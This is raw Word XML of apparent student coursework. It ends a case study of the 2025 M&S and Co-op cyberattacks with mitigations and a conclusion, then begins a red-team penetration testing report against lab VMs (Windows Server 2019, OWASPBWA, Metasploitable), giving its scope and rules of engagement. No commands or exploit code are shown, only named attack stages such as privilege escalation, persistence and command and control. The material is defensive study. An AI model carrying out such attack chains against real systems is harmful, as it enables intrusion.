    </w:p>
    <w:p w14:paraId="68384C49" w14:textId="30A229DE" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justification: The attacks exploited trusted relationships and weak identity verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D37737" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Medium Cost: Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C9905" w14:textId="1279E2D1" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enhance monitoring and detection capabilities: Implement real-time monitoring and alerting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for sensitive activities, including NTDS.dit access, unusual password resets, and abnormal user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F72DD5" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justification: Early credential compromise remained undetected for an extended period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA61620" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Medium-High Cost: Medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4F2A7" w14:textId="109D391F" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Strengthen network segmentation and zero-trust principles: Use strict segmentation controls to stop lateral movement, and make sure your backups are unchangeable and encrypted to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>protect against ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7646FC60" w14:textId="75836E7E" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justification: Once the attackers gained initial access, they moved freely across the network to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reach important systems and deploy ransomware. A 2025 peer-reviewed meta-analysis on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zerotrust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> architecture shows that proper segmentation and zero-trust controls reduce lateral movement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacks by 68% on average in enterprise networks. This would have made it much harder for the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attackers to spread from the initial foothold to VMware hosts in the M&amp;S case and </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>across Co-op</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>systems. The study also highlights faster threat detection, which was clearly missing in these incidents [18].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4CF35A" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: High Cost: Medium-High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C579B59" w14:textId="15713165" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct regular social engineering training: Staff, especially those in IT and support roles,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>should participate in ongoing awareness training and simulated vishing exercises [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF628D" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justification: Human factors were the primary vulnerability exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A47E0E" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Ongoing Cost: Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284E030" w14:textId="0D53AB09" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Update incident response plans: Establish clear escalation procedures, offline recovery strategies, and regularly test incident response plans [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E996A13" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justification: Recovery processes were prolonged and operationally disruptive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E875688" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Medium Cost: Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770BC78" w14:textId="433B554A" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implementing these controls would significantly reduce the likelihood and impact of similar attacks while</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>remaining practical for organizations operating in the UK retail sector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F2A58" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB17FE" w14:textId="765AB0FA" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4414A" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The attacks on M&amp;S and Co-op in 2025 really show that big threats often work by targeting people than just technology. Things like tricking people into doing something they should not do, stealing passwords, and ransomware caused a lot of problems and people lost a lot of information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7168D" w14:textId="52D9A1CD" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We can learn from these things that happened. These lessons can help make our safety measures stronger. We need to have technical safety measures and also make sure that people are who they say they are. This is very important. If we follow the advice from the NCSC and the IISF, especially using security checks that are hard to trick and being very careful when people ask for help, then M&amp;S and Co-op and other organisations can really be safe from these threats.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7026F7C4" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="6EDB1EB7" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="273A75EA" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="543A07D0" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="3347FFF7" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="0B0F7E4C" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="288419FE" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="055F70E8" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="2AB0ED15" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="7649A507" w14:textId="64B647A3" w:rsidR="00A000BA" w:rsidRPr="009B17B1" w:rsidRDefault="00A000BA" w:rsidP="009B17B1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B17B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TASK 2 — Red Team Engagement: ABCD Ltd — Complete Penetration Testing Technical Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F49F05" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="024CFAD4" w14:textId="1B092C49" w:rsidR="00A000BA" w:rsidRPr="009B17B1" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B17B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF71BD" w14:textId="02891B17" w:rsidR="00A000BA" w:rsidRDefault="00BE6727" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE6727">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>A detailed red team assessment of the virtualized network of ABCD Ltd. focusing on three assets is presented in this technical report. This assessment adopted a structured approach to red teaming in order to simulate an attack and perform a penetration test. The aim of the assessment was to show proof of concept end-to-end attack paths to access critical data, escalate privileges in an Active Directory domain and establish persistent command and control on multiple platforms. This review recommends improvements to network segmentation, detection and authentication to minimise risks.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64A91B" w14:textId="41E8B75E" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="00053404">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C8A18" w14:textId="2F4C7979" w:rsidR="0020761A" w:rsidRPr="003A1065" w:rsidRDefault="00FB180E" w:rsidP="003A1065">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t xml:space="preserve">A full security assessment via red teaming is required in the ever-evolving cyber threat landscape. Red teaming against malicious threat actors and their tactics, methods, and procedures (TTPs) assesses an organization's capabilities to defend against real attacks [19]. To test detection, prevention, and response technologies, this attempt to breach ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Ltd's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB180E">
        <w:t xml:space="preserve"> network leverages targeted attacks on the vulnerabilities of Windows Server 2019, OWASP Broken Web Applications (OWASPBWA), and Metasploitable virtual machines. The virtualized environment offers containment of activities and opportunity to implement attack chains, delivering observable metrics on the effectiveness of security controls and preparedness of an organisation against advanced malicious techniques.</w:t>
      </w:r>
      <w:r w:rsidR="0020761A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98F989" w14:textId="040AE669" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="00053404">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2 Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E709820" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The scope of engagement includes three virtualized machines in a remote network environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018E846" w14:textId="5A920257" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Windows Server 2019 (192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="007864B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) — Active Directory Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46939D19" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Target 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: OWASPBWA (192.168.227.128) — Vulnerable web application server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE8F7E" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F0197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:num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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Target 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Metasploitable (192.168.227.129) — Legacy Linux service host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365AF9B2" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00905635">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Activities including reconnaissance, scanning, unauthenticated and authenticated exploitation, privilege escalation, lateral movement, exfiltration (simulation), and persistence are all allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57046C8F" w14:textId="5FC57D0B" w:rsidR="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00905635">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denial-of-service, destructive payloads, physical damage and other network connections are not permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F0408" w14:textId="556D23D4" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00905635">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Termination as soon as possible when communicated via special channels with the word REDSTOP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE2DD5" w14:textId="1882869F" w:rsidR="00A000BA" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Any type of operation within secluded laboratory setting with clear permission. None of the interactions between production systems allowed. Ability to fully restore VM snapshots during engagement.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B4B65" w14:textId="3CEDC12B" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="00053404">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
